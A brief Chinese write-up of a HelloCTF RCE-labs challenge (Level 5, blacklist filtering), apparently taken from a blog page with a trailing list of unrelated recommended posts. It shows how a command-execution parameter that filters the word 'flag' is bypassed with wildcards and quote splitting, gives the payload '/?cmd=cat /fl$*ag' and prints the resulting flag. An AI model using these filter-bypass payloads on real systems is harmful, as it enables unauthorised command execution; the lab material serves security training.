HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
zhu12893035562 小时前
网络安全与防护策略
网络·安全·web安全
viqecel2 小时前
网站改版html页面 NGINX 借用伪静态和PHP脚本 实现301重定向跳转
nginx·php·nginx重定向·301重定向·html页面重定向
virelin_Y.lin3 小时前
系统与网络安全------Windows系统安全(1)
windows·安全·web安全·系统安全
zhu12893035564 小时前
网络安全基础与防护策略
网络·安全·web安全
jingshaoyou5 小时前
Strongswan linked_list_t链表 注释可独立运行测试
数据结构·链表·网络安全·list
小爬虫程序猿6 小时前
利用 PHP 爬虫按关键字搜索淘宝商品
开发语言·爬虫·php
小爬虫程序猿6 小时前
淘宝商品信息如何存储到数据库?
数据库·爬虫·php
鹅肝手握高V五色7 小时前
Wireshark入门教程:如何抓取和过滤网络数据包
websocket·网络协议·tcp/ip·http·网络安全·https·udp
sszdlbw8 小时前
BUUCTF-web刷题篇(6)
web安全·web·buuctf
nixiaoge9 小时前
RCE漏洞
网络安全